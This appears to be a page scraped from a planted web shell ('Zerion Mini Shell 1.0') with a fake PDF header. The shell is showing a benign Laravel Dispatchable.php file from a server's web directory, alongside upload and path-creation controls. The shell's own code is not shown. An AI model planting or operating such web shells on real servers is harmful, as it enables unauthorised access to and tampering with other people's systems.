%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/coding/vendor/laravel/framework/src/Illuminate/Foundation/Bus/
Upload File :
Create Path :
Current File : /var/www/html/coding/vendor/laravel/framework/src/Illuminate/Foundation/Bus/Dispatchable.php

<?php

namespace Illuminate\Foundation\Bus;

trait Dispatchable
{
    /**
     * Dispatch the job with the given arguments.
     *
     * @return \Illuminate\Foundation\Bus\PendingDispatch
     */
    public static function dispatch()
    {
        return new PendingDispatch(new static(...func_get_args()));
    }
}

Zerion Mini Shell 1.0